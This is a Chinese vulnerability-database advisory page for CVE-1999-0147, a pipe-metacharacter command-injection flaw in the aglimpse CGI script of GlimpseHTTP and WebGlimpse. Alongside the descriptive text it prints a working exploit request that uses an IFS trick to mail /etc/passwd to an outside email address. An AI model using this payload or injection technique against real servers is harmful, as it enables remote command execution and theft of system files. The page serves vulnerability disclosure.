Glimpse aglimpse CGI程序执行任意命令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105251 漏洞类型 未知
发布时间 1996-07-03 更新时间 2006-11-16
CVE编号 CVE-1999-0147 CNNVD-ID CNNVD-199707-002
漏洞平台 Unix CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20449
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-002
|漏洞详情
Glimpse数据包的aglimpseCGI程序存在漏洞。远程用户可以执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2026/info

WebGlimpse and GlimpseHTTP are web indexing and search engine programs with some associated management scripts. GlimpseHTTP up to and including 2.0, and WebGlimpse prior to version 1.5, suffer from a common vulnerability involving the component "aglimpse". This script fails to filter the pipe metacharacter, allowing arbitrary command execution. The demonstration exploit for this vulnerability includes the unix shell "IFS" (Internal Field Separator) variable for situations where the web server filters space characters - by setting this to an acceptable character ("5" in the example exploit) it is possible to use commands with more than one field. (eg., "mail me@myhost.tld"). 

GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:university_of_arizona:glimpse_http:2.0*cpe:/a:university_of_arizona:webglimpse:1.5andpreviousversions*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0147